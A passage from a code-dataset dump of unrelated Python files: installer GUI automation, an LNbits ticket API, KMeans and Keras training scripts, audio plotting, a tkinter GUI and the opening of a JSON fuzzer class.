protein-CUI list\n for line in f:\n # add protein score and name to data lists\n line = line.rstrip().split('\\t')\n line[0] = line[0].rstrip()\n x.append(int(line[0][1:]))\n y.append(float(line[1]))\n xy = dict(zip(x,y))\n # CUI vs. chr order plot, separate series for ribo and other proteins\n plt.figure(1)\n plt.scatter([x for x in sorted(xy)], [xy[x] for x in sorted(xy)], marker='.',\\\n edgecolors='none')\n plt.title('CUI vs. genes in chromosomal order')\n plt.xlabel('Genes (chromosomal order)')\n plt.ylabel('Codon Usage Index')\n # CUI in ascending order plot \n plt.figure(2)\n plt.scatter(range(1, len(y)+1), sorted(y), marker='.', edgecolors='none')\n plt.title('CUI vs. genes in ascending order')\n plt.xlabel('Genes (ascending order)')\n plt.ylabel('Codon Usage Index')\n # CUI histogram plot\n plt.figure(3)\n plt.hist(y)\n plt.title('Histogram of CUIs')\n plt.xlabel('Codon Usage Index')\n plt.ylabel('Count')\n plt.show()\n","sub_path":"src/Week 2/Exercise4-plot.py","file_name":"Exercise4-plot.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"587114127","text":"######################################################################################################################################\r\n'''\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t \r\nThis first part is for installing the 3.6.1 and the SQL server on a fresh os\t\t\t\r\n\r\nconfigSettingsList indexes -\r\n0 - Reporter account email\r\n1 - Reporter account password\r\n2 - Web application port\r\n3 - IP address\r\n4 - Host header name\r\n5 - Query Engine port\r\n6 - PDFService port \r\n7 - Database server \r\n8 - Server login ID\r\n9 - Server password\r\n10 - Reporter database name\r\n11 - Reverse Proxy\r\n12 - Windows authentication credentials \r\n\r\n''' \t\t\t\t\t\t\t\t\t\t\t \r\n######################################################################################################################################\r\ndef fresh_install_main(pr,sql,configSettingsList):\r\n\tprint(\"Importing\")\r\n\r\n\ttry:\r\n\t\tfrom pywinauto.keyboard import SendKeys\r\n\t\timport time\r\n\t\timport pywinauto\r\n\t\tfrom pywinauto import application\r\n\t\timport guiFunctions\r\n\r\n\texcept:\r\n\t\tprint(\"Import failed\")\r\n\t\traise Exception()\r\n\r\n\r\n\tprint(\"Starting installer\")\r\n\ttry:\r\n\t\tapp = application.Application(backend = \"uia\")\r\n\t\tapp.start(sql) #Starts the installer at the sql path\r\n\r\n\texcept:\r\n\t\tprint(\"Failed to start installer\")\r\n\t\traise Exception()\r\n\r\n\tprint(\"Connecting to Install sheild wizard\")\r\n\ttry:\t\r\n\t\tpywinauto.application.WindowSpecification(dict(title = \"RC-Reporter - InstallShield Wizard\", class_name = '#32770')).Install.wait(\"exists ready\",20,0.5)\r\n\t\twizard = app['RC-Reporter - InstallShield Wizard']\r\n\t\twizard.Install.click()\r\n\texcept: \r\n\t\tprint(\"Failed to connect\")\r\n\t\traise Exception()\r\n\t\r\n\t\t\r\n\tprint(\"Configuring database\")\r\n\t#Wait for configuraction database window to popup\r\n\ttry:\r\n\t\tif pywinauto.application.WindowSpecification(dict(title = \"Configuration Database\", class_name = '#32770')).Yes.exists(20,0.5) == True:\r\n\t\t\tapp.connect(title = \"Configuration Database\")\r\n\t\t\tconfig_database = app['Configuration Database']\r\n\r\n\t\t\tconfig_database.Yes.click()\r\n\texcept:\r\n\t\tprint(\"Failed to configure database\")\r\n\t\traise Exception()\r\n\t\r\n\t#Wait for IIS window to pop-up\r\n\tprint(\"Configuring IIS\")\r\n\ttry:\r\n\t\tpywinauto.application.WindowSpecification(dict(title = u\"Warning\", class_name = '#32770')).Yes.wait(\"exists ready\",720,1)\r\n\t\tapp.connect(title= \"Warning\")\r\n\t\twarning_dlg = app['Warning']\r\n\t\twarning_dlg.set_focus()\r\n\t\twarning_dlg.Yes.click()\r\n\texcept:\r\n\t\tprint(\"Failed to configure IIS\")\r\n\t\traise Exception()\r\n\r\n\t#Wait for installer to pop back up\r\n\tprint(\"Connecting to install shield wizard\")\r\n\ttry:\r\n\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = 'MsiDialogCloseClass')).wait(\"exists ready\",720,1)\r\n\t\tapp.connect(title = \"RC-Reporter - InstallShield Wizard\")\r\n\t\twizard2 = app['RC-Reporter - InstallShield Wizard']\r\n\r\n\texcept:\r\n\t\tprint(\"Could not connect to install sheild wizard\")\r\n\t\traise Exception()\r\n\r\n\tprint(\"Configuring settings\")\r\n\r\n\ttry:\r\n\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = 'MsiDialogCloseClass')).Next.wait(\"exists ready\",10,0.5)\r\n\t\twizard2.Next.wait('ready',5,0.25)\r\n\t\ttime.sleep(0.5) #Just a buffer to make sure clicks are not executed before the window is actually ready\r\n\t\twizard2.Next.click()\r\n\t\t\r\n\r\n\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = 'MsiDialogCloseClass')).Back.wait(\"exists ready\",10,0.5)\r\n\t\twizard2.Back.wait('ready',5,0.25)\r\n\t\ttime.sleep(0.5)\r\n\t\twizard2.RadioButton2.click()\r\n\t\twizard2.Next.click()\r\n\t\t\r\n\t\t#Wait for the next window to exist\r\n\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = 'MsiDialogCloseClass')).Button3.exists(20,0.5)\r\n\r\n\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = 'MsiDialogCloseClass')).Next.wait(\"exists ready\",10,0.5)\r\n\t\twizard2.Next.wait('ready',5,0.25)\r\n\t\ttime.sleep(0.5)\r\n\t\twizard2.Next.click()\r\n\t\t\r\n\t\t#Wait for the next window to exist\r\n\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = 'MsiDialogCloseClass')).RadioButton0.exists(20,0.5)\r\n\r\n\t\tflag = False\r\n\r\n\t\tfor i in range(2,6):\t#Checks all the textboxes to the user has entered anything\r\n\t\t\tif configSettingsList[i] != \"\":\r\n\t\t\t\tflag = True\r\n\r\n\t\tif configSettingsList[11] == \"true\":\t#Checks the reverse proxy check box\r\n\t\t\tflag = True\r\n\r\n\t\tif flag == True:\t#If this flag is true, the user has enterd one of the settings under custom settings so we run this block of code to enter it\r\n\t\t\ttry:\r\n\t\t\t\tprint(\"Entering custom settings\")\r\n\r\n\t\t\t\t'''\r\n\t\t\t\tEdit1 = IP Address\r\n\t\t\t\tEdit2 = Host header name\r\n\t\t\t\tEdit3 = PDF service Port\r\n\t\t\t\tEdit4 = Web Application Port\r\n\t\t\t\tEdit5 = Query Engine Port\r\n\t\t\t\t'''\r\n\r\n\t\t\t\twizard2.RadioButton2.wait('ready',2,0.25)\r\n\t\t\t\twizard2.RadioButton2.click()\r\n\t\t\t\twizard2.Edit1.wait('ready',2,0.25)\r\n\r\n\t\t\t\tif configSettingsList[2] != \"\":\t#Web app port\r\n\t\t\t\t\twizard2.Edit4.type_keys(configSettingsList[2])\r\n\t\t\t\t\ttime.sleep(1)\r\n\t\t\t\tif configSettingsList[3] != \"\":\t#Ip address\r\n\t\t\t\t\twizard2.Edit1.type_keys(configSettingsList[3])\r\n\t\t\t\t\ttime.sleep(1)\r\n\t\t\t\tif configSettingsList[4] != \"\":\t#Host header name\r\n\t\t\t\t\twizard2.Edit2.type_keys(configSettingsList[4])\r\n\t\t\t\t\ttime.sleep(1)\r\n\t\t\t\tif configSettingsList[5] != \"\":\t#Query Engine Port\r\n\t\t\t\t\twizard2.Edit5.type_keys(configSettingsList[5])\r\n\t\t\t\t\ttime.sleep(1)\r\n\t\t\t\tif configSettingsList[6] != \"\":\t#PDFService Port\r\n\t\t\t\t\twizard2.Edit3.type_keys(configSettingsList[6])\r\n\t\t\t\t\ttime.sleep(1)\r\n\t\t\t\tif configSettingsList[11] == \"true\": #Reverse Proxy\r\n\t\t\t\t\twizard2.CheckBox.click()\r\n\r\n\t\t\texcept:\r\n\t\t\t\tprint(\"Failed to enter custom settings\")\r\n\t\t\t\traise Exception()\r\n\r\n\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = 'MsiDialogCloseClass')).Next.wait(\"exists ready\",10,0.5)\r\n\t\twizard2.Next.wait('ready',5,0.25)\r\n\t\ttime.sleep(0.5)\r\n\t\twizard2.Next.click()\r\n\t\t\r\n\t\t#Wait for the next window to exist\r\n\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = 'MsiDialogCloseClass')).Button2.exists(20,0.5)\r\n\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = 'MsiDialogCloseClass')).Next.wait(\"exists ready\",10,0.5)\r\n\t\t\r\n\t\ttry:\r\n\t\t\tfor i in range(7,10):\t#Checking if there are custom database settings\r\n\t\t\t\tif configSettingsList[i] != \"\":\r\n\t\t\t\t\tprint(\"Entering Custom Settings\")\r\n\t\t\t\t\tbreak\r\n\r\n\t\t\tif configSettingsList[7] != \"\": #Database server\r\n\t\t\t\twizard1.Edit1.type_keys(configSettingsList[7])\r\n\t\t\t\ttime.sleep(1)\r\n\t\t\tif configSettingsList[12] == \"true\": #Windows authentication credentials\r\n\t\t\t\twizard1.radioButton1.click()\r\n\t\t\t\ttime.sleep(1)\r\n\t\t\telse:\r\n\t\t\t\tif configSettingsList[8] != \"\": #Login ID\r\n\t\t\t\t\twizard1.Edit2.type_keys(configSettingsList[8])\r\n\t\t\t\t\ttime.sleep(1)\r\n\t\t\t\tif configSettingsList[9] != \"\": #Password\r\n\t\t\t\t\twizard1.Edit3.type_keys(configSettingsList[9])\r\n\t\t\t\t\ttime.sleep(1)\r\n\r\n\t\t\tif configSettingsList[10] != \"\": #Database name\r\n\t\t\t\twizard1.Edit4.type_keys(configSettingsList[10])\r\n\t\t\t\ttime.sleep(1)\r\n\r\n\t\t\twizard2.Next.wait('ready',5,0.25)\r\n\t\t\ttime.sleep(2)\r\n\t\t\twizard2.Next.click()\r\n\t\t\tpywinauto.application.WindowSpecification(dict(class_name = 'WindowsForms10.Window.8.app.0.141b42a_r6_ad1')).exists(20,0.5)\r\n\t\t\twhile pywinauto.application.WindowSpecification(dict(class_name = 'WindowsForms10.Window.8.app.0.141b42a_r6_ad1')).exists(0.5,0.5) == True:\r\n\t\t\t\ttime.sleep(0.5)\r\n\r\n\t\texcept:\r\n\t\t\tprint(\"Database Authentication Failed\")\r\n\t\t\traise Exception()\r\n\r\n\texcept:\r\n\t\tprint(\"Failed entering configuration settings\")\r\n\t\traise Exception()\r\n\r\n\r\n\tprint(\"Entering login details\")\r\n\r\n\ttry:\r\n\t\tif wizard1.Browse.exists(1,0.5) == True: #Sometimes the previous click dosent do anything (idk why) so this checks to see if the correct window is open\r\n\t\t\twizard1.Next.click()\r\n\t\t\t\r\n\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = 'MsiDialogCloseClass')).Edit1.wait(\"exists ready\",10,0.5)\r\n\t\twizard2.Edit1.wait('ready',5,0.25)\r\n\t\twizard2.set_focus()\r\n\r\n\t\twizard2.Edit1.type_keys(configSettingsList[0])\r\n\t\ttime.sleep(1)\r\n\r\n\t\twizard2.Edit2.type_keys(configSettingsList[1])\r\n\t\ttime.sleep(1)\r\n\r\n\t\twizard2.Edit3.type_keys(configSettingsList[1])\r\n\t\ttime.sleep(1)\r\n\t\twizard2.Next.click()\r\n\r\n\texcept: \r\n\t\tprint(\"Failed entering login info\")\r\n\t\traise Exception()\r\n\r\n\tprint(\"Installing SQL build\")\r\n\r\n\ttry:\r\n\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = 'MsiDialogCloseClass')).Install.wait(\"exists ready\",10,0.5)\r\n\t\ttime.sleep(1)\r\n\t\twizard2.Install.wait('ready',5,0.25)\r\n\t\twizard2.Install.click()\r\n\t\t\r\n\t\t#This if statement checks to see if the trial license window pops up\r\n\t\tif pywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = '#32770')).exists(5,0.5) == True:\r\n\t\t\tapp.connect(title = \"RC-Reporter - InstallShield Wizard\")\r\n\t\t\twizard3 = app['RC-Reporter - InstallShield Wizard2']\r\n\t\t\twizard3.OK.wait('ready',5,0.25)\r\n\t\t\twizard3.OK.click()\r\n\r\n\t\twhile True:\r\n\t\t\tif pywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = 'MsiDialogCloseClass')).Finish.exists(5,0.5) == True:\r\n\t\t\t\tbreak\r\n\r\n\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = 'MsiDialogCloseClass')).Finish.wait(\"exists ready\",10,0.5)\r\n\t\twizard2.Finish.click()\r\n\texcept:\r\n\t\tprint(\"Failed to install PR build\")\r\n\t\traise Exception()\r\n\r\n\tprint(\"Finished Installing SQL build\")\r\n\r\n\r\n\t######################################################################################################################################\r\n\t'''\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t \r\n\t#This part is for installing the PR build\t\t\t\t\t\t\t\t\t \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t \r\n\t'''\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t \r\n\t######################################################################################################################################\r\n\tif pr == \"\":\r\n\t\treturn\r\n\r\n\telse:\r\n\t\tprint(\"Upgrading\")\r\n\r\n\t\ttry:\r\n\t\t\tapp.start(pr) \r\n\r\n\t\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = '#32770')).wait(\"ready\",15,0.5)\r\n\t\t\twizard4 = app['RC-Reporter - InstallShield Wizard']\r\n\t\t\twizard4.Yes.click()\r\n\r\n\t\t\tpywinauto.application.WindowSpecification(dict(title = u\"Windows Installer\", class_name = '#32770')).wait(\"ready\",15,0.5)\r\n\t\t\tpywinauto.application.WindowSpecification(dict(title = u\"Windows Installer\", class_name = '#32770')).wait_not(\"ready\",15,0.5)\r\n\t\t\t\r\n\t\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = 'MsiDialogCloseClass')).Next.wait(\"exists ready\",30,0.5)\r\n\t\t\tapp.connect(title = \"RC-Reporter - InstallShield Wizard\")\r\n\t\t\twizard5 = app['RC-Reporter - InstallShield Wizard']\r\n\r\n\t\t\twizard5.Next.click()\r\n\t\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = '#32770')).OK.wait(\"exists ready\",30,0.5)\r\n\t\t\twizard5.OK.click()\r\n\r\n\t\t\twizard5.Finish.exists(300,0.5)\r\n\t\t\ttime.sleep(0.5)\r\n\t\t\twizard5.Finish.click()\r\n\t\t\r\n\t\texcept: \r\n\t\t\tprint(\"Failed to install\")\r\n\t\t\traise Exception()\r\n\r\n\t\tprint(\"Finished Installation\")\r\n\t\t\r\n\t\treturn \r\n\r\nif __name__ == \"__main__\":\r\n\tfresh_install_main(pr,sql,configSettingsList)\r\n\r\n","sub_path":"RCRIA git/fresh_install.py","file_name":"fresh_install.py","file_ext":"py","file_size_in_byte":11943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"446748950","text":"import re\nfrom quart import g, jsonify, request\nfrom http import HTTPStatus\n\nfrom lnbits.core.crud import get_user, get_wallet\nfrom lnbits.core.services import create_invoice, check_invoice_status\nfrom lnbits.decorators import api_check_wallet_key, api_validate_post_request\n\nfrom . import lnticket_ext\nfrom .crud import (\n create_ticket,\n set_ticket_paid,\n get_ticket,\n get_tickets,\n delete_ticket,\n create_form,\n update_form,\n get_form,\n get_forms,\n delete_form,\n)\n\n\n# FORMS\n\n\n@lnticket_ext.route(\"/api/v1/forms\", methods=[\"GET\"])\n@api_check_wallet_key(\"invoice\")\nasync def api_forms():\n wallet_ids = [g.wallet.id]\n\n if \"all_wallets\" in request.args:\n wallet_ids = (await get_user(g.wallet.user)).wallet_ids\n\n return (\n jsonify([form._asdict() for form in await get_forms(wallet_ids)]),\n HTTPStatus.OK,\n )\n\n\n@lnticket_ext.route(\"/api/v1/forms\", methods=[\"POST\"])\n@lnticket_ext.route(\"/api/v1/forms/\", methods=[\"PUT\"])\n@api_check_wallet_key(\"invoice\")\n@api_validate_post_request(\n schema={\n \"wallet\": {\"type\": \"string\", \"empty\": False, \"required\": True},\n \"name\": {\"type\": \"string\", \"empty\": False, \"required\": True},\n \"webhook\": {\"type\": \"string\", \"required\": False},\n \"description\": {\"type\": \"string\", \"min\": 0, \"required\": True},\n \"amount\": {\"type\": \"integer\", \"min\": 0, \"required\": True},\n \"flatrate\": {\"type\": \"integer\", \"required\": True},\n }\n)\nasync def api_form_create(form_id=None):\n if form_id:\n form = await get_form(form_id)\n\n if not form:\n return jsonify({\"message\": \"Form does not exist.\"}), HTTPStatus.NOT_FOUND\n\n if form.wallet != g.wallet.id:\n return jsonify({\"message\": \"Not your form.\"}), HTTPStatus.FORBIDDEN\n\n form = await update_form(form_id, **g.data)\n else:\n form = await create_form(**g.data)\n return jsonify(form._asdict()), HTTPStatus.CREATED\n\n\n@lnticket_ext.route(\"/api/v1/forms/\", methods=[\"DELETE\"])\n@api_check_wallet_key(\"invoice\")\nasync def api_form_delete(form_id):\n form = await get_form(form_id)\n\n if not form:\n return jsonify({\"message\": \"Form does not exist.\"}), HTTPStatus.NOT_FOUND\n\n if form.wallet != g.wallet.id:\n return jsonify({\"message\": \"Not your form.\"}), HTTPStatus.FORBIDDEN\n\n await delete_form(form_id)\n\n return \"\", HTTPStatus.NO_CONTENT\n\n\n#########tickets##########\n\n\n@lnticket_ext.route(\"/api/v1/tickets\", methods=[\"GET\"])\n@api_check_wallet_key(\"invoice\")\nasync def api_tickets():\n wallet_ids = [g.wallet.id]\n\n if \"all_wallets\" in request.args:\n wallet_ids = (await get_user(g.wallet.user)).wallet_ids\n\n return (\n jsonify([form._asdict() for form in await get_tickets(wallet_ids)]),\n HTTPStatus.OK,\n )\n\n\n@lnticket_ext.route(\"/api/v1/tickets/\", methods=[\"POST\"])\n@api_validate_post_request(\n schema={\n \"form\": {\"type\": \"string\", \"empty\": False, \"required\": True},\n \"name\": {\"type\": \"string\", \"empty\": False, \"required\": True},\n \"email\": {\"type\": \"string\", \"empty\": True, \"required\": True},\n \"ltext\": {\"type\": \"string\", \"empty\": False, \"required\": True},\n \"sats\": {\"type\": \"integer\", \"min\": 0, \"required\": True},\n }\n)\nasync def api_ticket_make_ticket(form_id):\n form = await get_form(form_id)\n if not form:\n return jsonify({\"message\": \"LNTicket does not exist.\"}), HTTPStatus.NOT_FOUND\n\n nwords = len(re.split(r\"\\s+\", g.data[\"ltext\"]))\n sats = g.data[\"sats\"]\n\n try:\n payment_hash, payment_request = await create_invoice(\n wallet_id=form.wallet,\n amount=sats,\n memo=f\"ticket with {nwords} words on {form_id}\",\n extra={\"tag\": \"lnticket\"},\n )\n except Exception as e:\n return jsonify({\"message\": str(e)}), HTTPStatus.INTERNAL_SERVER_ERROR\n\n ticket = await create_ticket(\n payment_hash=payment_hash, wallet=form.wallet, **g.data\n )\n\n if not ticket:\n return (\n jsonify({\"message\": \"LNTicket could not be fetched.\"}),\n HTTPStatus.NOT_FOUND,\n )\n\n return (\n jsonify({\"payment_hash\": payment_hash, \"payment_request\": payment_request}),\n HTTPStatus.OK,\n )\n\n\n@lnticket_ext.route(\"/api/v1/tickets/\", methods=[\"GET\"])\nasync def api_ticket_send_ticket(payment_hash):\n ticket = await get_ticket(payment_hash)\n try:\n status = await check_invoice_status(ticket.wallet, payment_hash)\n is_paid = not status.pending\n except Exception:\n return jsonify({\"paid\": False}), HTTPStatus.OK\n\n if is_paid:\n wallet = await get_wallet(ticket.wallet)\n payment = await wallet.get_payment(payment_hash)\n await payment.set_pending(False)\n ticket = await set_ticket_paid(payment_hash=payment_hash)\n return jsonify({\"paid\": True}), HTTPStatus.OK\n\n return jsonify({\"paid\": False}), HTTPStatus.OK\n\n\n@lnticket_ext.route(\"/api/v1/tickets/\", methods=[\"DELETE\"])\n@api_check_wallet_key(\"invoice\")\nasync def api_ticket_delete(ticket_id):\n ticket = await get_ticket(ticket_id)\n\n if not ticket:\n return jsonify({\"message\": \"Paywall does not exist.\"}), HTTPStatus.NOT_FOUND\n\n if ticket.wallet != g.wallet.id:\n return jsonify({\"message\": \"Not your ticket.\"}), HTTPStatus.FORBIDDEN\n\n await delete_ticket(ticket_id)\n\n return \"\", HTTPStatus.NO_CONTENT\n","sub_path":"lnbits/extensions/lnticket/views_api.py","file_name":"views_api.py","file_ext":"py","file_size_in_byte":5442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"185650295","text":"import numpy as np\nimport pandas as pd\n\nfrom KMeans.Common.KMeansEnsemble import KMeansEnsemble\n\n\nclass TwoDimensionalData(KMeansEnsemble):\n def __init__(\n self,\n data_dimension: int,\n cluster_count: int = 8,\n ensemble_count: int = 8,\n rows=1000) -> None:\n self.rows = rows\n\n np.random.seed(112)\n data = np.random.randn(self.rows, data_dimension)\n\n super().__init__(\n data=data,\n data_dimension=data_dimension,\n cluster_count=cluster_count,\n ensemble_count=ensemble_count,\n create_centroids=self.create_centroids_with_zeros)\n\n @staticmethod\n def create_centroids_with_zeros(k, d):\n return np.zeros([k, d], dtype=np.float32)\n\n","sub_path":"KMeans/Python/KMeans/TwoDimensional/TwoDimensionalData.py","file_name":"TwoDimensionalData.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"167276817","text":"from pydub import AudioSegment\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom matplotlib import mlab as mlab\n\n\ncall = AudioSegment.from_file('data/G_&_L_Beverly_100117.mp3', format = 'mp3')\n# Extract left and right channel from the MP3 file\nchan_left = AudioSegment.split_to_mono(call)[0]\nchan_right = AudioSegment.split_to_mono(call)[1]\n\nchan1 = np.fromstring(chan_left.raw_data, np.int16)\nchan2 = np.fromstring(chan_right.raw_data, np.int16)\n\nplt.subplot(2, 1, 1)\nplt.plot(chan1)\nplt.subplot(2, 1, 2)\nplt.plot(chan2)\nplt.show()\n\n#~ x = mlab.specgram(chan1)\nplt.specgram(chan2, Fs = 8000)\nplt.show()\n\n","sub_path":"brokers/brokers.py","file_name":"brokers.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"11174811","text":"from tkinter import *\n\n\n\n\n\n\ndef adicionar():\n\n texto['text'] = 'Palavra: ' + caixa_pesquisa.get()\n\n\n#Janela\nwindows = Tk()\nwindows.title('Searching In Excel')\nwindows.geometry('400x300+100+50')\n\n#Menu Superior\nmenu = Menu(windows)\nwindows.config(menu=menu)\n\nAlterarPlanilha = Menu(menu)\nAlterarPlanilha.add_command(label='Planilha 1') #Para add + é só duplicar\nAlterarPlanilha.add_command(label='Planilha 2')\nmenu.add_cascade(label='Alterar Planilha', menu=AlterarPlanilha)\n\n#Barra de Pesquisa\ncaixa_pesquisa = Entry(windows, font='arial 18')\ncaixa_pesquisa.pack()\n\n\n#Textos\ntexto = Label(windows, text='...', font='arial 14 bold')\ntexto.pack() #Para add o widget a janela\n\n#Botões\nbotao_verificar = Button(windows, text='Verificar',font='arial 8 bold', bg='grey',fg='white',command=adicionar)\n#botao_adicionar = Button(windows, text='Adicionar',font='arial 8 bold', bg='grey',fg='white',command=adicionar)\nbotao_verificar.pack() #Para add o botão\n#botao_adicionar.pack()\n#botao_verificar.focus() #Focar no botão de entrada\n\n#Saída\nwindows.mainloop() #Ultimo a ser executado no código da janela\n","sub_path":"ProjetosPython/Automation_Bots/SearchInExcel_WithAnki.py","file_name":"SearchInExcel_WithAnki.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"39741633","text":"from alexnet import alex_model\nimport numpy as np\nimport pandas as pd\nimport os\nfrom keras.optimizers import Adam\nfrom keras.callbacks import ModelCheckpoint, TensorBoard, EarlyStopping, ReduceLROnPlateau\n\nfrom sklearn.cross_validation import KFold\n\nNB_CLASS = 3\nDROPOUT_RATE = 0.5\nDATA_FORMAT = 'channels_last'\nbatch_size = 32\nepochs = 100\nnfolds = 5\nrandom_state = 2018\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0,1\"\n\n\ndef get_predict_label(predict):\n return np.argmax(predict, 1)\n\n\ndef merge_several_folds_mean(data, nfolds):\n a = np.array(data[0])\n for i in range(1, nfolds):\n a += np.array(data[i])\n a /= nfolds\n # return a.tolist()\n return a\n\n\n# def accuracy(y_true, y_predict):\n\n\ndef model_train():\n print('-'*30)\n print('Load train data Start...')\n from data_load import load_train_data, load_train_label, load_test_data\n\n imgs_train = load_train_data()\n imgs_train_label = load_train_label()\n # imgs_train_label = np.vstack(imgs_train_label)\n from keras.utils import to_categorical\n \"\"\"\n to_categorical(y, num_classes=None, dtype='float32')\n 将整型标签转为onehot。y为int数组,num_classes为标签类别总数,大于max(y)(标签从0开始的)。\n \"\"\"\n imgs_train_label = to_categorical(imgs_train_label)\n print('Load train data End...')\n # print(imgs_train_label)\n\n print('Load test data Start...')\n imgs_test = load_test_data()\n print('Load test data End...')\n\n print('-'*30)\n print('Predicting on test data...')\n print('-'*30)\n\n print('-'*30)\n model = alex_model(NB_CLASS=NB_CLASS,\n DROPOUT_RATE=DROPOUT_RATE, DATA_FORMAT=DATA_FORMAT)\n model.compile(optimizer=Adam(\n lr=1e-5), loss='categorical_crossentropy', metrics=['categorical_accuracy'])\n print('Model Compiled')\n\n model_checkpoint = ModelCheckpoint(\n 'weights.h5', monitor='val_loss', save_best_only=True)\n\n earlystop = EarlyStopping(monitor='val_loss', patience=20, verbose=0)\n\n reduce_lr = ReduceLROnPlateau(\n factor=0.1, patience=10, min_lr=0.00001, verbose=1)\n\n tensorboard = TensorBoard(log_dir='./logs', # log 目录\n histogram_freq=1, # 按照何等频率(epoch)来计算直方图,0为不计算\n batch_size=batch_size, # 用多大量的数据计算直方图\n write_graph=True, # 是否存储网络结构图\n write_grads=False, # 是否可视化梯度直方图\n write_images=False, # 是否可视化参数\n embeddings_freq=0,\n embeddings_layer_names=None,\n embeddings_metadata=None)\n\n print('-'*30)\n print('Fitting model...')\n print('-'*30)\n\n yfull_test = []\n\n scores = []\n\n kf = KFold(len(imgs_train), n_folds=nfolds,\n shuffle=True, random_state=random_state)\n\n num_fold = 0\n for train_index, test_index in kf:\n X_train, X_valid = imgs_train[train_index], imgs_train[test_index]\n Y_train, Y_valid = imgs_train_label[train_index], imgs_train_label[test_index]\n\n num_fold += 1\n print('Start KFold number {} from {}'.format(num_fold, nfolds))\n print('Split train: ', len(X_train), len(Y_train))\n print('Split valid: ', len(X_valid), len(Y_valid))\n\n model.fit(imgs_train, imgs_train_label, batch_size=batch_size, epochs=epochs, verbose=1, shuffle=True,\n validation_split=0.2,\n callbacks=[model_checkpoint, earlystop, reduce_lr, tensorboard])\n\n # print('-'*30)\n # print('Loading saved weights...')\n # print('-'*30)\n # model.load_weights('weights.h5')\n\n # predictions_valid = model.predict(\n # X_valid, batch_size=batch_size, verbose=1)\n\n # Store test predictions\n test_prediction = model.predict(\n imgs_test, batch_size=batch_size, verbose=1)\n yfull_test.append(test_prediction)\n\n test_res = merge_several_folds_mean(yfull_test, nfolds)\n\n np.save('predict.npy', test_res)\n predict = get_predict_label(test_res)\n result = pd.DataFrame()\n result['predict'] = predict\n result.to_csv('result.csv', index=None)\n\n\nif __name__ == '__main__':\n model_train()\n","sub_path":"train_kfold.py","file_name":"train_kfold.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"367253579","text":"\"\"\"\nThe MIT License (MIT)\n\nCopyright (c) 2016 Daniele Linguaglossa \n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\"\"\"\nimport random\nimport string\nfrom core.pjf_external_fuzzer import JsonExternalFuzzer\n\nclass JsonMutators(object):\n \"\"\"\n Class that represent all the available mutators based on type\n \"\"\"\n\n def __init__(self, level=6):\n self.level = level\n self.external = JsonExternalFuzzer(fuzzer=\"radamsa\", stdin=True, commandline=\"\")\n self.string_mutator = 